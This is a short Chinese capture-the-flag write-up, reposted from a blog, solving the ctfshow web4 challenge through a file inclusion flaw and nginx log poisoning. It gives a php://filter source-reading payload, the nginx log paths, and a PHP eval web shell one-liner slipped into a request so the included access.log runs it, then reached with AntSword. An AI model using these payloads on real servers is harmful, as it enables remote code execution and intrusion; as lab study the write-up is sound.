首页 > Web开发 > 详细

CTF show-web4

时间:2020-03-02 14:21:48      阅读:274      评论:0      收藏:0      [点我收藏+]

日志包含漏洞

验证是文件包含漏洞

技术分享图片

想读取源码,但是返回error

技术分享图片

?url=php://filter/read=convert.base64-encode/resource=index.php

技术分享图片


参考了一点其他大佬的WP

 

通过查看请求头可以知道服务器为Ubuntu,由nginx搭建的网站,

技术分享图片

nginx的日志文件在/var/log/nginx/access.log和/var/log/nginx/error.log,其中access.log可以打开

技术分享图片


为了防止url编码,需要使用burp

如果直接在url里面插入一句话会返回:

400 Bad Request

因此只能在burp参数里面插入一句话

<?php eval($_POST[hack]);?>

之后用蚁剑连接access.log文件就行了,之前的一句话就插入到这里面了,但是网页上是无法显示出来的

得到flag:

技术分享图片

 

CTF show-web4

原文:https://www.cnblogs.com/echoDetected/p/12394920.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!